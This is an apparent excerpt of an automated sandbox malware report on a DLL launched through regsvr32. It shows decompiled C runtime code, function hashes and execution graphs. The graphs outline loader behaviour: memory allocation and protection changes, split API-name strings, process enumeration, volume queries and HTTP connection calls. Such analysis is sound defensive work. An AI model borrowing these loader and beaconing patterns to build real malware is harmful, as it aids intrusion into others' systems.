                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3E70C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 23%
                                                      			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t213;
				signed char _t218;
				void* _t249;
				intOrPtr _t257;
				signed int _t331;
				signed int _t332;
				signed long long _t335;
				intOrPtr* _t354;
				intOrPtr* _t359;
				signed long long _t389;

				_t331 = __rax;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t331;
				goto 0xf9d3e844;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t331;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
				_t332 = E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e807;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e844;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
				if (_a1304 >= 0) goto 0xf9d3e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0xf9d3e88b;
				_t335 = _a1304;
				_a1312 = _t335;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
				_a1312 = _a1312 & _t335;
				if (_a116 >= 0) goto 0xf9d3e8d1;
				_a116 = 1;
				goto 0xf9d3e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0xf9d3e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t213 = _a116;
				_a116 = _a116 - 1;
				if (_t213 > 0) goto 0xf9d3e92f;
				if (_a1312 == 0) goto 0xf9d3e9cc;
				_a1480 = _a72;
				_a1296 = _t213 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
				_t218 = _a1296 + _a1220;
				_a1296 = _t218;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3e90e;
				_a104 = _t218;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
				if (_a104 == 0) goto 0xf9d3ea0b;
				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0xf9d3ec29;
				if (_a104 <= 0) goto 0xf9d3ec29;
				_t354 = _a64;
				_a1328 = _t354;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0xf9d3ec27;
				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
				_a1496 = _t354;
				E000007FE7FEF9D26840(_t249,  &_a120);
				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0xf9d3ebe7;
				_a1200 = 0xffffffff;
				goto 0xf9d3ec27;
				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0xf9d3eb61;
				goto 0xf9d3ec47;
				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0xf9d3ec9c;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3da75;
				if (_a1216 == 0) goto 0xf9d3ecc2;
				if (_a1216 == 7) goto 0xf9d3ecc2;
				_a1504 = 0;
				goto 0xf9d3eccd;
				_a1504 = 1;
				_t257 = _a1504;
				_a1344 = _t257;
				if (_a1344 != 0) goto 0xf9d3ed13;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t257 != 1) goto 0xf9d3ed13;
				asm("int3");
				if (_a1344 != 0) goto 0xf9d3ed6f;
				0xf9d2ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3ed8e;
				_a1380 = _a1200;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                                      0x7fef9d3e70c
                                                      0x7fef9d3e70c
                                                      0x7fef9d3e717
                                                      0x7fef9d3e72a
                                                      0x7fef9d3e731
                                                      0x7fef9d3e740
                                                      0x7fef9d3e745
                                                      0x7fef9d3e74f
                                                      0x7fef9d3e762
                                                      0x7fef9d3e768
                                                      0x7fef9d3e77b
                                                      0x7fef9d3e785
                                                      0x7fef9d3e78a
                                                      0x7fef9d3e792
                                                      0x7fef9d3e7a2
                                                      0x7fef9d3e7ac
                                                      0x7fef9d3e7b1
                                                      0x7fef9d3e7b9
                                                      0x7fef9d3e7c7
                                                      0x7fef9d3e7d2
                                                      0x7fef9d3e7e1
                                                      0x7fef9d3e7e5
                                                      0x7fef9d3e7ed
                                                      0x7fef9d3e7f7
                                                      0x7fef9d3e7ff
                                                      0x7fef9d3e807
                                                      0x7fef9d3e812
                                                      0x7fef9d3e81c
                                                      0x7fef9d3e823
                                                      0x7fef9d3e82b
                                                      0x7fef9d3e835
                                                      0x7fef9d3e83c
                                                      0x7fef9d3e84d
                                                      0x7fef9d3e858
                                                      0x7fef9d3e865
                                                      0x7fef9d3e871
                                                      0x7fef9d3e879
                                                      0x7fef9d3e87b
                                                      0x7fef9d3e883
                                                      0x7fef9d3e896
                                                      0x7fef9d3e8a3
                                                      0x7fef9d3e8b8
                                                      0x7fef9d3e8c5
                                                      0x7fef9d3e8c7
                                                      0x7fef9d3e8cf
                                                      0x7fef9d3e8d8
                                                      0x7fef9d3e8e4
                                                      0x7fef9d3e8e6
                                                      0x7fef9d3e8f7
                                                      0x7fef9d3e8f9
                                                      0x7fef9d3e909
                                                      0x7fef9d3e90e
                                                      0x7fef9d3e918
                                                      0x7fef9d3e91e
                                                      0x7fef9d3e929
                                                      0x7fef9d3e934
                                                      0x7fef9d3e957
                                                      0x7fef9d3e963
                                                      0x7fef9d3e990
                                                      0x7fef9d3e9a2
                                                      0x7fef9d3e9a4
                                                      0x7fef9d3e9b8
                                                      0x7fef9d3e9c2
                                                      0x7fef9d3e9c7
                                                      0x7fef9d3e9d9
                                                      0x7fef9d3e9e5
                                                      0x7fef9d3e9f5
                                                      0x7fef9d3e9fc
                                                      0x7fef9d3ea09
                                                      0x7fef9d3ea13
                                                      0x7fef9d3ea1d
                                                      0x7fef9d3ea26
                                                      0x7fef9d3ea2f
                                                      0x7fef9d3ea3e
                                                      0x7fef9d3ea4b
                                                      0x7fef9d3ea52
                                                      0x7fef9d3ea57
                                                      0x7fef9d3ea5f
                                                      0x7fef9d3ea6a
                                                      0x7fef9d3ea71
                                                      0x7fef9d3ea76
                                                      0x7fef9d3ea7e
                                                      0x7fef9d3ea89
                                                      0x7fef9d3ea90
                                                      0x7fef9d3ea95
                                                      0x7fef9d3eaad
                                                      0x7fef9d3eabd
                                                      0x7fef9d3eada
                                                      0x7fef9d3eaf8
                                                      0x7fef9d3eb06
                                                      0x7fef9d3eb11
                                                      0x7fef9d3eb2e
                                                      0x7fef9d3eb38
                                                      0x7fef9d3eb43
                                                      0x7fef9d3eb49
                                                      0x7fef9d3eb4e
                                                      0x7fef9d3eb5a
                                                      0x7fef9d3eb71
                                                      0x7fef9d3eb7a
                                                      0x7fef9d3eb85
                                                      0x7fef9d3eb8a
                                                      0x7fef9d3eb97
                                                      0x7fef9d3ebc9
                                                      0x7fef9d3ebd8
                                                      0x7fef9d3ebda
                                                      0x7fef9d3ebe5
                                                      0x7fef9d3ebff
                                                      0x7fef9d3ec1a
                                                      0x7fef9d3ec22
                                                      0x7fef9d3ec27
                                                      0x7fef9d3ec42
                                                      0x7fef9d3ec4f
                                                      0x7fef9d3ec5a
                                                      0x7fef9d3ec77
                                                      0x7fef9d3ec82
                                                      0x7fef9d3ec8e
                                                      0x7fef9d3ec93
                                                      0x7fef9d3ec9c
                                                      0x7fef9d3eca9
                                                      0x7fef9d3ecb3
                                                      0x7fef9d3ecb5
                                                      0x7fef9d3ecc0
                                                      0x7fef9d3ecc2
                                                      0x7fef9d3eccd
                                                      0x7fef9d3ecd4
                                                      0x7fef9d3ece3
                                                      0x7fef9d3ece5
                                                      0x7fef9d3ecec
                                                      0x7fef9d3ecf1
                                                      0x7fef9d3ecf4
                                                      0x7fef9d3ed06
                                                      0x7fef9d3ed0e
                                                      0x7fef9d3ed10
                                                      0x7fef9d3ed1b
                                                      0x7fef9d3ed1d
                                                      0x7fef9d3ed22
                                                      0x7fef9d3ed28
                                                      0x7fef9d3ed31
                                                      0x7fef9d3ed4c
                                                      0x7fef9d3ed51
                                                      0x7fef9d3ed61
                                                      0x7fef9d3ed6d
                                                      0x7fef9d3ed76
                                                      0x7fef9d3ed82
                                                      0x7fef9d3eda5

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: '$9
                                                      • API String ID: 1967237116-1823400153
                                                      • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                      • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                                      • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                      • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3D710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                      • API String ID: 2480363372-1749241151
                                                      • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                      • Instruction ID: 04ee9255729ef7e149dbf43242f730f4bbed3ff16cc2c5ac2558ad9c7efde415
                                                      • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                      • Instruction Fuzzy Hash: BC113D7AA2868686EBE49B94DC41B6D63E1F780755F205035E68E43BA4CB3DE404CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D41200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                      • String ID: csm
                                                      • API String ID: 1826589669-1018135373
                                                      • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                      • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                                      • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                      • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2F3E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                      • API String ID: 2882679554-3458198949
                                                      • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                      • Instruction ID: d33f1896f8d52307a9012ea76dc3fce74adc3acb1f5112dbea688671cc213a85
                                                      • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                      • Instruction Fuzzy Hash: 3B01F431A1C78286EBD09B6AE88576EB3D4F390350F614535E6CD43FA9DBBED4058B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:16.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:4%
                                                      Total number of Nodes:99
                                                      Total number of Limit Nodes:14
                                                      execution_graph 4060 1800178f4 4063 18000ffc0 4060->4063 4062 180017924 4068 18001000e 4063->4068 4067 1800116b2 4067->4062 4068->4067 4071 18002975c 4068->4071 4075 180015774 4068->4075 4079 1800078a4 4068->4079 4083 180007eb4 4068->4083 4087 18001667c 4068->4087 4073 1800297af 4071->4073 4074 180029f99 4073->4074 4095 18000c758 4073->4095 4074->4068 4077 1800157bd 4075->4077 4078 1800157fb 4077->4078 4111 1800027f8 4077->4111 4078->4068 4082 1800078c0 4079->4082 4081 1800079e2 4081->4068 4082->4081 4118 18001705c 4082->4118 4086 180007ee1 4083->4086 4085 180008118 4085->4068 4086->4085 4129 180011ef8 4086->4129 4091 1800166ac 4087->4091 4092 180016ad3 4091->4092 4132 180023624 4091->4132 4136 180018bdc 4091->4136 4140 18000bc98 4091->4140 4144 18001aec8 4091->4144 4148 1800270c0 4091->4148 4092->4068 4101 18000c7dc 4095->4101 4096 18000c9b5 4102 18002446c 4096->4102 4097 18000c84b 4097->4073 4101->4096 4101->4097 4105 1800149cc 4101->4105 4108 180016500 4101->4108 4103 1800244af 4102->4103 4104 180024558 InternetOpenW 4103->4104 4104->4097 4107 180014a4c 4105->4107 4106 180014ae5 HttpOpenRequestW 4106->4101 4107->4106 4110 18001657b 4108->4110 4109 18001663c InternetConnectW 4109->4101 4110->4109 4114 180006f2c 4111->4114 4113 18000289c 4113->4077 4115 180006f5d 4114->4115 4116 180007250 Process32NextW 4115->4116 4117 180006fbc 4115->4117 4116->4115 4117->4113 4120 18001707b 4118->4120 4121 1800172eb 4120->4121 4122 180028348 4120->4122 4121->4082 4123 180028431 4122->4123 4124 180028607 4123->4124 4126 180017bf8 4123->4126 4124->4120 4127 180017c7c 4126->4127 4128 180017d21 GetVolumeInformationW 4127->4128 4128->4124 4131 180011f57 4129->4131 4130 180012017 CreateThread 4130->4085 4131->4130 4134 180023662 4132->4134 4133 180023683 4133->4091 4134->4133 4152 180018628 4134->4152 4138 180018c18 4136->4138 4137 180011ef8 CreateThread 4137->4138 4138->4137 4139 180018f32 4138->4139 4139->4091 4142 18000bcde 4140->4142 4141 18000c521 4141->4091 4142->4141 4143 180018628 CreateFileW 4142->4143 4143->4142 4146 18001aef6 4144->4146 4145 180011ef8 CreateThread 4145->4146 4146->4145 4147 18001b239 4146->4147 4147->4091 4150 180027157 4148->4150 4149 180027fe1 4149->4091 4150->4149 4151 180018628 CreateFileW 4150->4151 4151->4150 4153 180018660 4152->4153 4155 180018943 4153->4155 4156 18001bf0c 4153->4156 4155->4134 4158 18001bf8e 4156->4158 4157 18001c031 CreateFileW 4157->4153 4158->4157 4159 180011ef8 4161 180011f57 4159->4161 4160 180012017 CreateThread 4161->4160 4162 180018628 4163 180018660 4162->4163 4164 18001bf0c CreateFileW 4163->4164 4165 180018943 4163->4165 4164->4163 4166 18000c819 4170 18000c80c 4166->4170 4167 18000c9b5 4168 18002446c InternetOpenW 4167->4168 4171 18000c84b 4168->4171 4169 1800149cc HttpOpenRequestW 4169->4170 4170->4166 4170->4167 4170->4169 4170->4171 4172 180016500 InternetConnectW 4170->4172 4172->4170 4173 2d0000 4174 2d0183 4173->4174 4175 2d043e VirtualAlloc 4174->4175 4178 2d0462 4175->4178 4176 2d0531 GetNativeSystemInfo 4177 2d056d VirtualAlloc 4176->4177 4179 2d0a00 4176->4179 4180 2d058b 4177->4180 4178->4176 4178->4179 4180->4179 4181 2d09d9 VirtualProtect 4180->4181 4181->4180

                                                      Executed Functions

                                                      Function 002D0000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2d0000-2d0460 call 2d0aa8 * 2 VirtualAlloc 22 2d048a-2d0494 0->22 23 2d0462-2d0466 0->23 26 2d049a-2d049e 22->26 27 2d0a91-2d0aa6 22->27 24 2d0468-2d0488 23->24 24->22 24->24 26->27 28 2d04a4-2d04a8 26->28 28->27 29 2d04ae-2d04b2 28->29 29->27 30 2d04b8-2d04bf 29->30 30->27 31 2d04c5-2d04d2 30->31 31->27 32 2d04d8-2d04e1 31->32 32->27 33 2d04e7-2d04f4 32->33 33->27 34 2d04fa-2d0507 33->34 35 2d0509-2d0511 34->35 36 2d0531-2d0567 GetNativeSystemInfo 34->36 37 2d0513-2d0518 35->37 36->27 38 2d056d-2d0589 VirtualAlloc 36->38 39 2d051a-2d051f 37->39 40 2d0521 37->40 41 2d058b-2d059e 38->41 42 2d05a0-2d05ac 38->42 43 2d0523-2d052f 39->43 40->43 41->42 44 2d05af-2d05b2 42->44 43->36 43->37 46 2d05b4-2d05bf 44->46 47 2d05c1-2d05db 44->47 46->44 48 2d05dd-2d05e2 47->48 49 2d061b-2d0622 47->49 52 2d05e4-2d05ea 48->52 50 2d0628-2d062f 49->50 51 2d06db-2d06e2 49->51 50->51 53 2d0635-2d0642 50->53 54 2d06e8-2d06f9 51->54 55 2d0864-2d086b 51->55 56 2d05ec-2d0609 52->56 57 2d060b-2d0619 52->57 53->51 60 2d0648-2d064f 53->60 61 2d0702-2d0705 54->61 58 2d0917-2d0929 55->58 59 2d0871-2d087f 55->59 56->56 56->57 57->49 57->52 62 2d092f-2d0937 58->62 63 2d0a07-2d0a1a 58->63 64 2d090e-2d0911 59->64 65 2d0654-2d0658 60->65 66 2d06fb-2d06ff 61->66 67 2d0707-2d070a 61->67 69 2d093b-2d093f 62->69 88 2d0a1c-2d0a27 63->88 89 2d0a40-2d0a4a 63->89 64->58 68 2d0884-2d08a9 64->68 70 2d06c0-2d06ca 65->70 66->61 71 2d070c-2d071d 67->71 72 2d0788-2d078e 67->72 94 2d08ab-2d08b1 68->94 95 2d0907-2d090c 68->95 75 2d09ec-2d09fa 69->75 76 2d0945-2d095a 69->76 73 2d06cc-2d06d2 70->73 74 2d065a-2d0669 70->74 77 2d071f-2d0720 71->77 78 2d0794-2d07a2 71->78 72->78 73->65 80 2d06d4-2d06d5 73->80 84 2d066b-2d0678 74->84 85 2d067a-2d067e 74->85 75->69 86 2d0a00-2d0a01 75->86 82 2d095c-2d095e 76->82 83 2d097b-2d097d 76->83 87 2d0722-2d0784 77->87 90 2d085d-2d085e 78->90 91 2d07a8 78->91 80->51 96 2d096e-2d0979 82->96 97 2d0960-2d096c 82->97 99 2d097f-2d0981 83->99 100 2d09a2-2d09a4 83->100 98 2d06bd-2d06be 84->98 101 2d068c-2d0690 85->101 102 2d0680-2d068a 85->102 86->63 87->87 103 2d0786 87->103 104 2d0a38-2d0a3e 88->104 92 2d0a4c-2d0a54 89->92 93 2d0a7b-2d0a8e 89->93 90->55 105 2d07ae-2d07d4 91->105 92->93 107 2d0a56-2d0a78 92->107 93->27 116 2d08bb-2d08c8 94->116 117 2d08b3-2d08b9 94->117 95->64 108 2d09be-2d09bf 96->108 97->108 98->70 109 2d0989-2d098b 99->109 110 2d0983-2d0987 99->110 114 2d09ac-2d09bb 100->114 115 2d09a6-2d09aa 100->115 112 2d06a5-2d06a9 101->112 113 2d0692-2d06a3 101->113 111 2d06b6-2d06ba 102->111 103->78 104->89 106 2d0a29-2d0a35 104->106 126 2d0835-2d0839 105->126 127 2d07d6-2d07d9 105->127 106->104 107->93 122 2d09c5-2d09cb 108->122 109->100 120 2d098d-2d098f 109->120 110->108 111->98 112->98 121 2d06ab-2d06b3 112->121 113->111 114->108 115->108 124 2d08ca-2d08d1 116->124 125 2d08d3-2d08e5 116->125 123 2d08ea-2d08fe 117->123 128 2d0999-2d09a0 120->128 129 2d0991-2d0997 120->129 121->111 130 2d09cd-2d09d3 122->130 131 2d09d9-2d09e9 VirtualProtect 122->131 123->95 142 2d0900-2d0905 123->142 124->124 124->125 125->123 135 2d083b 126->135 136 2d0844-2d0850 126->136 133 2d07db-2d07e1 127->133 134 2d07e3-2d07f0 127->134 128->122 129->108 130->131 131->75 138 2d0812-2d082c 133->138 139 2d07fb-2d080d 134->139 140 2d07f2-2d07f9 134->140 135->136 136->105 141 2d0856-2d0857 136->141 138->126 144 2d082e-2d0833 138->144 139->138 140->139 140->140 141->90 142->94 144->127
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1240656808.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2d0000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                      • API String ID: 2313188843-2517549848
                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction ID: 27af7da60f8e159f921c9c0965cb960fdb099243c951251c6f8f7bd1735e21d8
                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction Fuzzy Hash: 1572D530628B498BDB19DF18D8857B9B7E1FB98305F10462EE8CAC7311DB34E956CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800248B0 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 511 1800248b0-18002490f call 18001feb0 514 180024914 511->514 515 180024916-18002491b 514->515 516 180024921-180024926 515->516 517 180024e2c-180024e96 call 18002a534 515->517 519 180024b7b-180024ba7 516->519 520 18002492c-180024931 516->520 525 180024e9b-180024e9d 517->525 523 180024e0d-180024e22 519->523 524 180024bad-180024bb2 519->524 521 180024937-18002493c 520->521 522 180024b6d-180024b76 520->522 526 180024942-180024947 521->526 527 180024ec7-180024f09 call 18001ce90 521->527 522->515 523->517 528 180024bd3-180024bd5 524->528 529 180024bb4-180024bbb 524->529 530 180024ea9-180024eb6 525->530 531 180024e9f-180024ea4 525->531 532 180024a99-180024b44 call 18001fa00 526->532 533 18002494d-180024952 526->533 545 180024f0e-180024f26 527->545 535 180024bc9-180024bce 528->535 537 180024bd7-180024da0 call 180020aa0 call 180022520 call 1800248b0 528->537 529->535 536 180024bbd-180024bc1 529->536 539 180024ebb-180024ec0 530->539 538 180024b5b-180024b68 531->538 549 180024b49-180024b50 532->549 533->539 541 180024958-180024a94 call 1800234d8 call 180001400 call 180029480 533->541 535->515 536->528 542 180024bc3-180024bc7 536->542 558 180024da5-180024e08 call 180029480 537->558 538->515 544 180024ec2 539->544 539->545 541->514 542->528 542->535 544->515 549->545 552 180024b56 549->552 552->538 558->535
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
